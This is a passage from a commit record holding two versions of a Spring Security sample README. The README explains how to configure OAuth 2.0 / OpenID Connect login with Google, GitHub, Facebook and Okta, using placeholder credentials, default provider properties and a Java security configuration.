http:\/\/developer.okta.com\/docs\/api\/resources\/oidc.html[Okta's OAuth 2.0 implementation] for authentication conforms to the\n http:\/\/openid.net\/connect\/[OpenID Connect] specification and is http:\/\/openid.net\/certification\/[OpenID Certified].\n\nIn order to use Okta's OAuth 2.0 authentication system for login, you must first https:\/\/www.okta.com\/developer\/signup[create a developer account].\n\n[[okta-login-add-auth-server]]\n=== Add Authorization Server\n\nSign in to your account _sub-domain_ and click on the _\"Admin\"_ button to navigate to the administration page.\nFrom the top menu bar on the administration page, navigate to *_Security -> API_* and then click on the _\"Add Authorization Server\"_ button.\nFrom the _\"Add Authorization Server\"_ page, enter the Name, Resource URI, Description (optional) and then click _\"Save\"_.\n\nNOTE: The Resource URI field is not relevant but it's a required field - enter _\"http:\/\/localhost:8080\/oauth2\/okta\"_.\n\nThe next page presented is the _\"Settings\"_ for the new Authorization Server.\nIn the next step, we will create a new application that will be assigned OAuth 2.0 client credentials and registered with the Authorization Server.\n\n[[okta-login-register-application]]\n=== Add Application\n\nFrom the top menu bar on the administration page, navigate to *_Applications -> Applications_* and then click on the _\"Add Application\"_ button.\nFrom the _\"Add Application\"_ page, click on the _\"Create New App\"_ button and enter the following:\n\n* *Platform:* Web\n* *Sign on method:* OpenID Connect\n\nClick on the _\"Create\"_ button.\nOn the _\"General Settings\"_ page, enter the Application Name (for example, _\"Spring Security Okta Login\"_) and then click on the _\"Next\"_ button.\nOn the _\"Configure OpenID Connect\"_ page, enter *http:\/\/localhost:8080\/oauth2\/authorize\/code\/okta* for the field *Redirect URIs* and then click _\"Finish\"_.\n\nNOTE: The *Redirect URI* is the path in the sample application that the end-user's user-agent is redirected back to after they have authenticated with Okta\n and have granted access to the application on the *Authorize application* page.\n\nTIP: The default redirect URI is *_\"{scheme}:\/\/{serverName}:{serverPort}\/oauth2\/authorize\/code\/{clientAlias}\"_*.\n See <<oauth2-client-properties, OAuth client properties>> for more details on this default.\n\nThe next page presented displays the _\"General\"_ tab selected for the application.\nThe _\"General\"_ tab displays the _\"Settings\"_ and _\"Client Credentials\"_ used by the application.\nIn the next step, we will _assign_ the application to _people_ in order to grant user(s) access to the application.\n\n[[okta-login-assign-application-people]]\n=== Assign Application to People\n\nFrom the _\"General\"_ tab of the application, select the _\"Assignments\"_ tab and then click the _\"Assign\"_ button.\nSelect _\"Assign to People\"_ and assign your account to the application. Then click the _\"Save and Go Back\"_ button.\n\n[[okta-login-configure-application-yml]]\n=== Configuring application.yml\n\nNow that we have created a new application with Okta, we need to configure the sample application (client) for the _authentication flow_.\n\nGo to *_src\/main\/resources_* and edit *application.yml*. Add the following configuration:\n\n[source,yaml]\n----\nsecurity:\n oauth2:\n client:\n okta:\n client-id: ${client-id}\n client-secret: ${client-secret}\n authorization-uri: https:\/\/${account-subdomain}.oktapreview.com\/oauth2\/v1\/authorize\n token-uri: https:\/\/${account-subdomain}.oktapreview.com\/oauth2\/v1\/token\n user-info-uri: https:\/\/${account-subdomain}.oktapreview.com\/oauth2\/v1\/userinfo\n----\n\nReplace *${client-id}* and *${client-secret}* with the *client credentials* created in the previous section <<okta-login-register-application, Add Application>>.\nAs well, replace *${account-subdomain}* in _authorization-uri_, _token-uri_ and _user-info-uri_ with the *sub-domain* assigned to your account during the registration process.\n\n[TIP]\n.OAuth client properties\n====\n. *security.oauth2.client* is the *_base property prefix_* for OAuth client properties.\n. Just below the *_base property prefix_* is the *_client property key_*, for example *security.oauth2.client.okta*.\n. At the base of the *_client property key_* are the properties for specifying the configuration for an OAuth Client.\n A list of these properties are detailed in <<oauth2-client-properties, OAuth client properties>>.\n====\n\n[[okta-login-run-sample]]\n=== Running the sample\n\nLaunch the Spring Boot application by running *_sample.OAuth2LoginApplication_*.\n\nAfter the application successfully starts up, go to http:\/\/localhost:8080. You'll then be redirected to http:\/\/localhost:8080\/login, which will display an _auto-generated login page_ with an anchor link for *Okta*.\n\nClick through on the Okta link and you'll be redirected to Okta for authentication.\n\nAfter you authenticate using your Okta credentials, the OAuth Client (application) will retrieve your email address and basic profile information from the http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#UserInfo[*UserInfo Endpoint*]\nand establish an _authenticated session_. The home page will then be displayed showing the user attributes retrieved from the UserInfo Endpoint, for example, name, email, profile, sub, etc.\n\n[[oauth2-login-auto-configuration]]\n== OAuth 2.0 Login auto-configuration\n\nAs you worked through this guide and setup OAuth 2.0 Login with one of the Providers,\nwe hope you noticed the ease in configuration and setup required in getting the sample up and running?\nAnd you may be asking, how does this all work? Thanks to some Spring Boot auto-configuration _magic_,\nwe were able to automatically register the OAuth Client(s) configured in the `Environment`,\nas well, provide a minimal security configuration for OAuth 2.0 Login.\n\nThe following provides an overview of the Spring Boot auto-configuration classes:\n\n[[client-registration-auto-configuration-class]]\n*_org.springframework.boot.autoconfigure.security.oauth2.client.ClientRegistrationAutoConfiguration_*::\n`ClientRegistrationAutoConfiguration` is responsible for registering a `ClientRegistrationRepository` _bean_ with the `ApplicationContext`.\nThe `ClientRegistrationRepository` is composed of one or more `ClientRegistration` instances, which are created from the OAuth client properties\nconfigured in the `Environment` that are prefixed with `security.oauth2.client.[client-key]`, for example, `security.oauth2.client.google`.\n\nNOTE: `ClientRegistrationAutoConfiguration` also loads a _resource_ named *oauth2-clients-defaults.yml*,\n which provides a set of default client property values for a number of _well-known_ Providers.\n More on this in the later section <<oauth2-default-client-properties, Default client property values>>.\n\n[[oauth2-login-auto-configuration-class]]\n*_org.springframework.boot.autoconfigure.security.oauth2.client.OAuth2LoginAutoConfiguration_*::\n`OAuth2LoginAutoConfiguration` is responsible for enabling OAuth 2.0 Login,\nonly if there is a `ClientRegistrationRepository` _bean_ available in the `ApplicationContext`.\n\nWARNING: The auto-configuration classes (and dependent resources) will eventually _live_ in the *Spring Boot Security Starter*.\n\n[[oauth2-client-properties]]\n=== OAuth client properties\n\nThe following specifies the common set of properties available for configuring an OAuth Client.\n\n[TIP]\n====\n- *security.oauth2.client* is the *_base property prefix_* for OAuth client properties.\n- Just below the *_base property prefix_* is the *_client property key_*, for example *security.oauth2.client.google*.\n- At the base of the *_client property key_* are the properties for specifying the configuration for an OAuth Client.\n====\n\n- *client-authentication-method* - the method used to authenticate the _Client_ with the _Provider_. Supported values are *header* and *form*.\n- *authorized-grant-type* - the OAuth 2.0 Authorization Framework defines the https:\/\/tools.ietf.org\/html\/rfc6749#section-1.3.1[Authorization Code] grant type,\n which is used to realize the _\"authentication flow\"_. Currently, this is the only supported grant type.\n- *redirect-uri* - this is the client's _registered_ redirect URI that the _Authorization Server_ redirects the end-user's user-agent\n to after the end-user has authenticated and authorized access for the client.\n\nNOTE: The default redirect URI is _\"{scheme}:\/\/{serverName}:{serverPort}\/oauth2\/authorize\/code\/{clientAlias}\"_, which leverages *URI template variables*.\n\n- *scopes* - a comma-delimited string of scope(s) requested during the _Authorization Request_ flow, for example: _openid, email, profile_\n\nNOTE: _OpenID Connect 1.0_ defines these http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#ScopeClaims[standard scopes]: _profile, email, address, phone_\n\nNOTE: Non-standard scopes may be defined by a standard _OAuth 2.0 Provider_. Please consult the Provider's OAuth API documentation to learn which scopes are supported.\n\n- *authorization-uri* - the URI used by the client to redirect the end-user's user-agent to the _Authorization Server_ in order to obtain authorization from the end-user (the _Resource Owner_).\n- *token-uri* - the URI used by the client when exchanging an _Authorization Grant_ (for example, Authorization Code) for an _Access Token_ at the _Authorization Server_.\n- *user-info-uri* - the URI used by the client to access the protected resource *UserInfo Endpoint*, in order to obtain attributes of the end-user.\n- *user-info-converter* - the `Converter` implementation class used to convert the *UserInfo Response* to a `UserInfo` (_OpenID Connect 1.0 Provider_) or `OAuth2User` instance (_Standard OAuth 2.0 Provider_).\n\nTIP: The `Converter` implementation class for an _OpenID Connect 1.0 Provider_ is *org.springframework.security.oauth2.client.user.converter.UserInfoConverter*\n and for a standard _OAuth 2.0 Provider_ it's *org.springframework.security.oauth2.client.user.converter.OAuth2UserConverter*.\n\n- *user-info-name-attribute-key* - the _key_ used to retrieve the *Name* of the end-user from the `Map` of available attributes in `UserInfo` or `OAuth2User`.\n\nNOTE: _OpenID Connect 1.0_ defines the http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#StandardClaims[*\"name\"* Claim], which is the end-user's full name and is the default used for `UserInfo`.\n\nIMPORTANT: Standard _OAuth 2.0 Provider's_ may vary the naming of their *Name* attribute. Please consult the Provider's *UserInfo* API documentation.\n This is a *_required_* property when *user-info-converter* is set to `OAuth2UserConverter`.\n\n- *client-name* - this is a descriptive name used for the client. The name may be used in certain scenarios, for example, when displaying the name of the client in the _auto-generated login page_.\n- *client-alias* - an _alias_ which uniquely identifies the client. It *must be* unique within a `ClientRegistrationRepository`.\n\n[[oauth2-default-client-properties]]\n=== Default client property values\n\nAs noted previously, <<client-registration-auto-configuration-class, `ClientRegistrationAutoConfiguration`>> loads a _resource_ named *oauth2-clients-defaults.yml*,\nwhich provides a set of default client property values for a number of _well-known_ Providers.\n\nFor example, the *authorization-uri*, *token-uri*, *user-info-uri* rarely change for a Provider and therefore it makes sense to\nprovide a set of defaults in order to reduce the configuration required by the user.\n\nBelow are the current set of default client property values:\n\n.oauth2-clients-defaults.yml\n[source,yaml]\n----\nsecurity:\n oauth2:\n client:\n google:\n client-authentication-method: header\n authorized-grant-type: authorization_code\n redirect-uri: \"{scheme}:\/\/{serverName}:{serverPort}{baseAuthorizeUri}\/{clientAlias}\"\n scopes: openid, email, profile\n authorization-uri: \"https:\/\/accounts.google.com\/o\/oauth2\/auth\"\n token-uri: \"https:\/\/accounts.google.com\/o\/oauth2\/token\"\n user-info-uri: \"https:\/\/www.googleapis.com\/oauth2\/v3\/userinfo\"\n user-info-converter: \"org.springframework.security.oauth2.client.user.converter.UserInfoConverter\"\n client-name: Google\n client-alias: google\n github:\n client-authentication-method: header\n authorized-grant-type: authorization_code\n redirect-uri: \"{scheme}:\/\/{serverName}:{serverPort}{baseAuthorizeUri}\/{clientAlias}\"\n scopes: user\n authorization-uri: \"https:\/\/github.com\/login\/oauth\/authorize\"\n token-uri: \"https:\/\/github.com\/login\/oauth\/access_token\"\n user-info-uri: \"https:\/\/api.github.com\/user\"\n user-info-converter: \"org.springframework.security.oauth2.client.user.converter.OAuth2UserConverter\"\n client-name: GitHub\n client-alias: github\n facebook:\n client-authentication-method: form\n authorized-grant-type: authorization_code\n redirect-uri: \"{scheme}:\/\/{serverName}:{serverPort}{baseAuthorizeUri}\/{clientAlias}\"\n scopes: public_profile, email\n authorization-uri: \"https:\/\/www.facebook.com\/v2.8\/dialog\/oauth\"\n token-uri: \"https:\/\/graph.facebook.com\/v2.8\/oauth\/access_token\"\n user-info-uri: \"https:\/\/graph.facebook.com\/me\"\n user-info-converter: \"org.springframework.security.oauth2.client.user.converter.OAuth2UserConverter\"\n client-name: Facebook\n client-alias: facebook\n okta:\n client-authentication-method: header\n authorized-grant-type: authorization_code\n redirect-uri: \"{scheme}:\/\/{serverName}:{serverPort}{baseAuthorizeUri}\/{clientAlias}\"\n scopes: openid, email, profile\n user-info-converter: \"org.springframework.security.oauth2.client.user.converter.UserInfoConverter\"\n client-name: Okta\n client-alias: okta\n----\n\n= Appendix\n'''\n\n[[configure-non-spring-boot-app]]\n== Configuring a _Non-Spring-Boot_ application\n\nIf you are not using Spring Boot for your application, you will not be able to leverage the auto-configuration features for OAuth 2.0 Login.\nYou will be required to provide your own _security configuration_ in order to enable OAuth 2.0 Login.\n\nThe following sample code demonstrates a minimal security configuration for enabling OAuth 2.0 Login.\n\nLet's assume we have a _properties file_ named *oauth2-clients.properties* on the _classpath_ and it specifies all the _required_ properties for an OAuth Client, specifically _Google_.\n\n.oauth2-clients.properties\n[source,properties]\n----\nsecurity.oauth2.client.google.client-id=${client-id}\nsecurity.oauth2.client.google.client-secret=${client-secret}\nsecurity.oauth2.client.google.client-authentication-method=header\nsecurity.oauth2.client.google.authorized-grant-type=authorization_code\nsecurity.oauth2.client.google.redirect-uri=http:\/\/localhost:8080\/oauth2\/authorize\/code\/google\nsecurity.oauth2.client.google.scopes=openid,email,profile\nsecurity.oauth2.client.google.authorization-uri=https:\/\/accounts.google.com\/o\/oauth2\/auth\nsecurity.oauth2.client.google.token-uri=https:\/\/accounts.google.com\/o\/oauth2\/token\nsecurity.oauth2.client.google.user-info-uri=https:\/\/www.googleapis.com\/oauth2\/v3\/userinfo\nsecurity.oauth2.client.google.user-info-converter=org.springframework.security.oauth2.client.user.converter.UserInfoConverter\nsecurity.oauth2.client.google.client-name=Google\nsecurity.oauth2.client.google.client-alias=google\n----\n\nThe following _security configuration_ will enable OAuth 2.0 Login using _Google_ as the _Authentication Provider_:\n\n[source,java]\n----\n@EnableWebSecurity\n@PropertySource(\"classpath:oauth2-clients.properties\")\npublic class SecurityConfig extends WebSecurityConfigurerAdapter {\n\tprivate Environment environment;\n\n\tpublic SecurityConfig(Environment environment) {\n\t\tthis.environment = environment;\n\t}\n\n\t@Override\n\tprotected void configure(HttpSecurity http) throws Exception {\n http\n .authorizeRequests()\n .anyRequest().authenticated()\n .and()\n .oauth2Login()\n .clients(clientRegistrationRepository())\n .userInfoEndpoint()\n .userInfoTypeConverter(\n new UserInfoConverter(),\n new URI(\"https:\/\/www.googleapis.com\/oauth2\/v3\/userinfo\"));\n\t}\n\n\t@Bean\n\tpublic ClientRegistrationRepository clientRegistrationRepository() {\n\t\tList<ClientRegistration> clientRegistrations = Collections.singletonList(\n\t\t\tclientRegistration(\"security.oauth2.client.google.\"));\n\n\t\treturn new InMemoryClientRegistrationRepository(clientRegistrations);\n\t}\n\n\tprivate ClientRegistration clientRegistration(String clientPropertyKey) {\n\t\tString clientId = this.environment.getProperty(clientPropertyKey + \"client-id\");\n\t\tString clientSecret = this.environment.getProperty(clientPropertyKey + \"client-secret\");\n\t\tClientAuthenticationMethod clientAuthenticationMethod = ClientAuthenticationMethod.valueOf(\n\t\t\tthis.environment.getProperty(clientPropertyKey + \"client-authentication-method\").toUpperCase());\n\t\tAuthorizationGrantType authorizationGrantType = AuthorizationGrantType.valueOf(\n\t\t\tthis.environment.getProperty(clientPropertyKey + \"authorized-grant-type\").toUpperCase());\n\t\tString redirectUri = this.environment.getProperty(clientPropertyKey + \"redirect-uri\");\n\t\tString[] scopes = this.environment.getProperty(clientPropertyKey + \"scopes\").split(\",\");\n\t\tString authorizationUri = this.environment.getProperty(clientPropertyKey + \"authorization-uri\");\n\t\tString tokenUri = this.environment.getProperty(clientPropertyKey + \"token-uri\");\n\t\tString userInfoUri = this.environment.getProperty(clientPropertyKey + \"user-info-uri\");\n\t\tString clientName = this.environment.getProperty(clientPropertyKey + \"client-name\");\n\t\tString clientAlias = this.environment.getProperty(clientPropertyKey + \"client-alias\");\n\n\t\treturn new ClientRegistration.Builder(clientId)\n\t\t\t.clientSecret(clientSecret)\n\t\t\t.clientAuthenticationMethod(clientAuthenticationMethod)\n\t\t\t.authorizedGrantType(authorizationGrantType)\n\t\t\t.redirectUri(redirectUri)\n\t\t\t.scopes(scopes)\n\t\t\t.authorizationUri(authorizationUri)\n\t\t\t.tokenUri(tokenUri)\n\t\t\t.userInfoUri(userInfoUri)\n\t\t\t.clientName(clientName)\n\t\t\t.clientAlias(clientAlias)\n\t\t\t.build();\n\t}\n}\n----\n","old_contents":"= OAuth 2.0 Login Sample\nJoe Grandja\n:toc:\n:security-site-url: https:\/\/projects.spring.io\/spring-security\/\n\n[.lead]\nThis guide will walk you through the steps for setting up the sample application with OAuth 2.0 Login using an external _OAuth 2.0_ or _OpenID Connect 1.0_ Provider.\nThe sample application is built with *Spring Boot 1.5* and the *spring-security-oauth2-client* module that is new in {security-site-url}[Spring Security 5.0].\n\nThe following sections outline detailed steps for setting up OAuth 2.0 Login with these Providers:\n\n* <<google-login, Google>>\n* <<github-login, GitHub>>\n* <<facebook-login, Facebook>>\n* <<okta-login, Okta>>\n\nNOTE: The _\"authentication flow\"_ is realized using the *Authorization Code Grant*, as specified in the https:\/\/tools.ietf.org\/html\/rfc6749#section-4.1[OAuth 2.0 Authorization Framework].\n\n[[sample-app-content]]\n== Sample application content\n\nThe sample application contains the following package structure and artifacts:\n\n*sample*\n\n[circle]\n* _OAuth2LoginApplication_ - the main class for the _Spring application_.\n** *user*\n*** _GitHubOAuth2User_ - a custom _UserInfo_ type for <<github-login, GitHub Login>>.\n** *web*\n*** _MainController_ - the root controller that displays user information after a successful login.\n\n*org.springframework.boot.autoconfigure.security.oauth2.client*\n\n[circle]\n* <<client-registration-auto-configuration-class, _ClientRegistrationAutoConfiguration_>> - a Spring Boot auto-configuration class\n that automatically registers a _ClientRegistrationRepository_ bean in the _ApplicationContext_.\n* <<oauth2-login-auto-configuration-class, _OAuth2LoginAutoConfiguration_>> - a Spring Boot auto-configuration class that automatically enables OAuth 2.0 Login.\n\nWARNING: The Spring Boot auto-configuration classes (and dependent resources) will eventually _live_ in the *Spring Boot Security Starter*.\n\nNOTE: See <<oauth2-login-auto-configuration, OAuth 2.0 Login auto-configuration>> for a detailed overview of the auto-configuration classes.\n\n[[google-login]]\n== Setting up *_Login with Google_*\n\nThe goal for this section of the guide is to setup login using Google as the _Authentication Provider_.\n\nNOTE: https:\/\/developers.google.com\/identity\/protocols\/OpenIDConnect[Google's OAuth 2.0 implementation] for authentication conforms to the\n http:\/\/openid.net\/connect\/[OpenID Connect] specification and is http:\/\/openid.net\/certification\/[OpenID Certified].\n\n[[google-login-register-credentials]]\n=== Register OAuth 2.0 credentials\n\nIn order to use Google's OAuth 2.0 authentication system for login, you must set up a project in the *Google API Console* to obtain OAuth 2.0 credentials.\n\nFollow the instructions on the https:\/\/developers.google.com\/identity\/protocols\/OpenIDConnect[OpenID Connect] page starting in the section *_\"Setting up OAuth 2.0\"_*.\n\nAfter completing the sub-section, *_\"Obtain OAuth 2.0 credentials\"_*, you should have created a new *OAuth Client* with credentials consisting of a *Client ID* and *Client Secret*.\n\n[[google-login-redirect-uri]]\n=== Setting the redirect URI\n\nThe redirect URI is the path in the sample application that the end-user's user-agent is redirected back to after they have authenticated with Google\nand have granted access to the OAuth Client _(created from the <<google-login-register-credentials, previous step>>)_ on the *Consent screen* page.\n\nFor the sub-section, *_\"Set a redirect URI\"_*, ensure the *Authorised redirect URIs* is set to *http:\/\/localhost:8080\/oauth2\/authorize\/code\/google*\n\nTIP: The default redirect URI is *_\"{scheme}:\/\/{serverName}:{serverPort}\/oauth2\/authorize\/code\/{clientAlias}\"_*.\n See <<oauth2-client-properties, OAuth client properties>> for more details on this default.\n\n[[google-login-configure-application-yml]]\n=== Configuring application.yml\n\nNow that we have created a new OAuth Client with Google, we need to configure the sample application to use this OAuth Client for the _authentication flow_.\n\nGo to *_src\/main\/resources_* and edit *application.yml*. Add the following configuration:\n\n[source,yaml]\n----\nsecurity:\n oauth2:\n client:\n google:\n client-id: ${client-id}\n client-secret: ${client-secret}\n----\n\nReplace *${client-id}* and *${client-secret}* with the OAuth 2.0 credentials created in the previous section <<google-login-register-credentials, Register OAuth 2.0 credentials>>.\n\n[TIP]\n.OAuth client properties\n====\n. *security.oauth2.client* is the *_base property prefix_* for OAuth client properties.\n. Just below the *_base property prefix_* is the *_client property key_*, for example *security.oauth2.client.google*.\n. At the base of the *_client property key_* are the properties for specifying the configuration for an OAuth Client.\n A list of these properties are detailed in <<oauth2-client-properties, OAuth client properties>>.\n====\n\n[[google-login-run-sample]]\n=== Running the sample\n\nLaunch the Spring Boot application by running *_sample.OAuth2LoginApplication_*.\n\nAfter the application successfully starts up, go to http:\/\/localhost:8080. You'll then be redirected to http:\/\/localhost:8080\/login, which will display an _auto-generated login page_ with an anchor link for *Google*.\n\nClick through on the Google link and you'll be redirected to Google for authentication.\n\nAfter you authenticate using your Google credentials, the next page presented to you will be the *Consent screen*.\nThe Consent screen will ask you to either *_Allow_* or *_Deny_* access to the OAuth Client you created in the previous step <<google-login-register-credentials, Register OAuth 2.0 credentials>>.\nClick *_Allow_* to authorize the OAuth Client to access your _email address_ and _basic profile_ information.\n\nAt this point, the OAuth Client will retrieve your email address and basic profile information from the http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#UserInfo[*UserInfo Endpoint*] and establish an _authenticated session_.\nThe home page will then be displayed showing the user attributes retrieved from the UserInfo Endpoint, for example, name, email, profile, sub, etc.\n\n[[github-login]]\n== Setting up *_Login with GitHub_*\n\nThe goal for this section of the guide is to setup login using GitHub as the _Authentication Provider_.\n\nNOTE: https:\/\/developer.github.com\/v3\/oauth\/[GitHub's OAuth 2.0 implementation] supports the standard\n https:\/\/tools.ietf.org\/html\/rfc6749#section-4.1[authorization code grant type].\n However, it *does not* implement the _OpenID Connect 1.0_ specification.\n\n[[github-login-register-application]]\n=== Register OAuth application\n\nIn order to use GitHub's OAuth 2.0 authentication system for login, you must https:\/\/github.com\/settings\/applications\/new[_Register a new OAuth application_].\n\nWhile registering your application, ensure the *Authorization callback URL* is set to *http:\/\/localhost:8080\/oauth2\/authorize\/code\/github*.\n\nNOTE: The *Authorization callback URL* (or redirect URI) is the path in the sample application that the end-user's user-agent is redirected back to after they have authenticated with GitHub\n and have granted access to the OAuth application on the *Authorize application* page.\n\nTIP: The default redirect URI is *_\"{scheme}:\/\/{serverName}:{serverPort}\/oauth2\/authorize\/code\/{clientAlias}\"_*.\n See <<oauth2-client-properties, OAuth client properties>> for more details on this default.\n\nAfter completing the registration, you should have created a new *OAuth Application* with credentials consisting of a *Client ID* and *Client Secret*.\n\n[[github-login-configure-application-yml]]\n=== Configuring application.yml\n\nNow that we have created a new OAuth application with GitHub, we need to configure the sample application to use this OAuth application (client) for the _authentication flow_.\n\nGo to *_src\/main\/resources_* and edit *application.yml*. Add the following configuration:\n\n[source,yaml]\n----\nsecurity:\n oauth2:\n client:\n github:\n client-id: ${client-id}\n client-secret: ${client-secret}\n----\n\nReplace *${client-id}* and *${client-secret}* with the OAuth 2.0 credentials created in the previous section <<github-login-register-application, Register OAuth application>>.\n\n[TIP]\n.OAuth client properties\n====\n. *security.oauth2.client* is the *_base property prefix_* for OAuth client properties.\n. Just below the *_base property prefix_* is the *_client property key_*, for example *security.oauth2.client.github*.\n. At the base of the *_client property key_* are the properties for specifying the configuration for an OAuth Client.\n A list of these properties are detailed in <<oauth2-client-properties, OAuth client properties>>.\n====\n\n[[github-login-run-sample]]\n=== Running the sample\n\nLaunch the Spring Boot application by running *_sample.OAuth2LoginApplication_*.\n\nAfter the application successfully starts up, go to http:\/\/localhost:8080. You'll then be redirected to http:\/\/localhost:8080\/login, which will display an _auto-generated login page_ with an anchor link for *GitHub*.\n\nClick through on the GitHub link and you'll be redirected to GitHub for authentication.\n\nAfter you authenticate using your GitHub credentials, the next page presented to you is *Authorize application*.\nThis page will ask you to *Authorize* the application you created in the previous step <<github-login-register-application, Register OAuth application>>.\nClick *_Authorize application_* to allow the OAuth application to access your _Personal user data_ information.\n\nAt this point, the OAuth application will retrieve your personal user information from the *UserInfo Endpoint* and establish an _authenticated session_.\nThe home page will then be displayed showing the user attributes retrieved from the UserInfo Endpoint, for example, id, name, email, login, etc.\n\nTIP: For detailed information returned from the *UserInfo Endpoint* see the API documentation\n for https:\/\/developer.github.com\/v3\/users\/#get-the-authenticated-user[_Get the authenticated user_].\n\n[[facebook-login]]\n== Setting up *_Login with Facebook_*\n\nThe goal for this section of the guide is to setup login using Facebook as the _Authentication Provider_.\n\nNOTE: Facebook provides support for developers to https:\/\/developers.facebook.com\/docs\/facebook-login\/manually-build-a-login-flow[_Manually Build a Login Flow_].\n The _login flow_ uses browser-based redirects, which essentially implements the https:\/\/tools.ietf.org\/html\/rfc6749#section-4.1[authorization code grant type].\n (NOTE: Facebook partially implements the _OAuth 2.0 Authorization Framework_, however, it *does not* implement the _OpenID Connect 1.0_ specification.)\n\n[[facebook-login-register-application]]\n=== Add a New App\n\nIn order to use Facebook's OAuth 2.0 authentication system for login, you must first https:\/\/developers.facebook.com\/apps[_Add a New App_].\n\nAfter clicking _\"Create a New App\"_, the _\"Create a New App ID\"_ page is presented. Enter the Display Name, Contact Email, Category and then click _\"Create App ID\"_.\n\nNOTE: The selection for the _Category_ field is not relevant but it's a required field - select _\"Local\"_.\n\nThe next page presented is _\"Product Setup\"_. Click the _\"Get Started\"_ button for the *_Facebook Login_* product. In the left sidebar, under *_Products -> Facebook Login_*, select *_Settings_*.\n\nFor the field *Valid OAuth redirect URIs*, enter *http:\/\/localhost:8080\/oauth2\/authorize\/code\/facebook* then click _\"Save Changes\"_.\n\nNOTE: The *OAuth redirect URI* is the path in the sample application that the end-user's user-agent is redirected back to after they have authenticated with Facebook\n and have granted access to the application on the *Authorize application* page.\n\nTIP: The default redirect URI is *_\"{scheme}:\/\/{serverName}:{serverPort}\/oauth2\/authorize\/code\/{clientAlias}\"_*.\n See <<oauth2-client-properties, OAuth client properties>> for more details on this default.\n\nYour application has now been assigned new OAuth 2.0 credentials under *App ID* and *App Secret*.\n\n[[facebook-login-configure-application-yml]]\n=== Configuring application.yml\n\nNow that we have created a new application with Facebook, we need to configure the sample application to use this application (client) for the _authentication flow_.\n\nGo to *_src\/main\/resources_* and edit *application.yml*. Add the following configuration:\n\n[source,yaml]\n----\nsecurity:\n oauth2:\n client:\n facebook:\n client-id: ${app-id}\n client-secret: ${app-secret}\n----\n\nReplace *${app-id}* and *${app-secret}* with the OAuth 2.0 credentials created in the previous section <<facebook-login-register-application, Add a New App>>.\n\n[TIP]\n.OAuth client properties\n====\n. *security.oauth2.client* is the *_base property prefix_* for OAuth client properties.\n. Just below the *_base property prefix_* is the *_client property key_*, for example *security.oauth2.client.facebook*.\n. At the base of the *_client property key_* are the properties for specifying the configuration for an OAuth Client.\n A list of these properties are detailed in <<oauth2-client-properties, OAuth client properties>>.\n====\n\n[[facebook-login-run-sample]]\n=== Running the sample\n\nLaunch the Spring Boot application by running *_sample.OAuth2LoginApplication_*.\n\nAfter the application successfully starts up, go to http:\/\/localhost:8080. You'll then be redirected to http:\/\/localhost:8080\/login, which will display an _auto-generated login page_ with an anchor link for *Facebook*.\n\nClick through on the Facebook link and you'll be redirected to Facebook for authentication.\n\nAfter you authenticate using your Facebook credentials, the next page presented to you will be *Authorize application*.\nThis page will ask you to *Authorize* the application you created in the previous step <<facebook-login-register-application, Add a New App>>.\nClick *_Authorize application_* to allow the OAuth application to access your _public profile_ and _email address_.\n\nAt this point, the OAuth application will retrieve your personal user information from the *UserInfo Endpoint* and establish an _authenticated session_.\nThe home page will then be displayed showing the user attributes retrieved from the UserInfo Endpoint, for example, id, name, etc.\n\n[[okta-login]]\n== Setting up *_Login with Okta_*\n\nThe goal for this section of the guide is to setup login using Okta as the _Authentication Provider_.\n\nNOTE: http:\/\/developer.okta.com\/docs\/api\/resources\/oidc.html[Okta's OAuth 2.0 implementation] for authentication conforms to the\n http:\/\/openid.net\/connect\/[OpenID Connect] specification and is http:\/\/openid.net\/certification\/[OpenID Certified].\n\nIn order to use Okta's OAuth 2.0 authentication system for login, you must first https:\/\/www.okta.com\/developer\/signup[create a developer account].\n\n[[okta-login-add-auth-server]]\n=== Add Authorization Server\n\nSign in to your account _sub-domain_ and click on the _\"Admin\"_ button to navigate to the administration page.\nFrom the top menu bar on the administration page, navigate to *_Security -> API_* and then click on the _\"Add Authorization Server\"_ button.\nFrom the _\"Add Authorization Server\"_ page, enter the Name, Resource URI, Description (optional) and then click _\"Save\"_.\n\nNOTE: The Resource URI field is not relevant but it's a required field - enter _\"http:\/\/localhost:8080\/oauth2\/okta\"_.\n\nThe next page presented is the _\"Settings\"_ for the new Authorization Server.\nIn the next step, we will create a new application that will be assigned OAuth 2.0 client credentials and registered with the Authorization Server.\n\n[[okta-login-register-application]]\n=== Add Application\n\nFrom the top menu bar on the administration page, navigate to *_Applications -> Applications_* and then click on the _\"Add Application\"_ button.\nFrom the _\"Add Application\"_ page, click on the _\"Create New App\"_ button and enter the following:\n\n* *Platform:* Web\n* *Sign on method:* OpenID Connect\n\nClick on the _\"Create\"_ button.\nOn the _\"General Settings\"_ page, enter the Application Name (for example, _\"Spring Security Okta Login\"_) and then click on the _\"Next\"_ button.\nOn the _\"Configure OpenID Connect\"_ page, enter *http:\/\/localhost:8080\/oauth2\/authorize\/code\/okta* for the field *Redirect URIs* and then click _\"Finish\"_.\n\nNOTE: The *Redirect URI* is the path in the sample application that the end-user's user-agent is redirected back to after they have authenticated with Okta\n and have granted access to the application on the *Authorize application* page.\n\nTIP: The default redirect URI is *_\"{scheme}:\/\/{serverName}:{serverPort}\/oauth2\/authorize\/code\/{clientAlias}\"_*.\n See <<oauth2-client-properties, OAuth client properties>> for more details on this default.\n\nThe next page presented displays the _\"General\"_ tab selected for the application.\nThe _\"General\"_ tab displays the _\"Settings\"_ and _\"Client Credentials\"_ used by the application.\nIn the next step, we will _assign_ the application to _people_ in order to grant user(s) access to the application.\n\n[[okta-login-assign-application-people]]\n=== Assign Application to People\n\nFrom the _\"General\"_ tab of the application, select the _\"People\"_ tab and then click on the _\"Assign to People\"_ button.\nAssign your account to the application and then click on the _\"Save and Go Back\"_ button.\n\n[[okta-login-configure-application-yml]]\n=== Configuring application.yml\n\nNow that we have created a new application with Okta, we need to configure the sample application (client) for the _authentication flow_.\n\nGo to *_src\/main\/resources_* and edit *application.yml*. Add the following configuration:\n\n[source,yaml]\n----\nsecurity:\n oauth2:\n client:\n okta:\n client-id: ${client-id}\n client-secret: ${client-secret}\n authorization-uri: https:\/\/${account-subdomain}.oktapreview.com\/oauth2\/v1\/authorize\n token-uri: https:\/\/${account-subdomain}.oktapreview.com\/oauth2\/v1\/token\n user-info-uri: https:\/\/${account-subdomain}.oktapreview.com\/oauth2\/v1\/userinfo\n----\n\nReplace 